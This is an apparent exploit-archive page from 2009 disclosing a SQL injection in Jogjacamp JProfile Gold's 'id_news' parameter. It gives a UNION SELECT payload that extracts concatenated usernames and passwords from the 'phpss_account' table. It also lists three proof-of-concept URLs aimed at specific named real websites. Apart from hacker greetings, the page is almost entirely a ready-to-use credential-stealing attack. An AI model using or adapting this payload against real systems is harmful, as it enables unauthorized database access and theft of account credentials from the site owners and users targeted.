[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Jogjacamp JProfile Gold (id_news) Remote SQL Injection Vulnerability
# Published : 2009-03-03
# Author : kecemplungkalen
# Previous Title : NovaBoard <= 1.0.1 (message) Persistent XSS Vulnerability
# Next Title : Dogfood CRM 2.0.10 spell.php Command Injection


###############################################################

     __                                                   
    |__|__ ________   ____     ___________   ______  _  __
    |  |  |  ____ _/ __   _/ ____  __ _/ __  / / /
    |  |  |  /  |_> >  ___/    ___|  | /  ___/     / 
/__|  |____/|   __/ ___  >  ___  >__|    ___  >/_/  
______|     |__|        /       /            /        



###############################################################


Jogjacamp JProfile Gold SQL Injection

by kecemplungkalen 

Vendor  : http://jogjacamp.com

bugs	: /index.php?action=news.detail&id_news=

exploit : union select concat(username,0x3a,password),2,3 from phpss_account--

POC	: http://www.titiandamai.org/index.php?action=news.detail&id_news=6%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--

	  http://www.ligaindonesia.com/index.php?action=news.detail&id_news=1976%20%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--

	  http://hermawan.net/index.php?action=news.detail&id_news=42%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--

###############################################################

greetz	: Allah
	  s3t4n and Paman aka Jack-
	  my family
	  and all Mainhack BrotherHood 
	  jupe crew jangan ngegame melulu :p

# www.Syue.com [2009-03-03]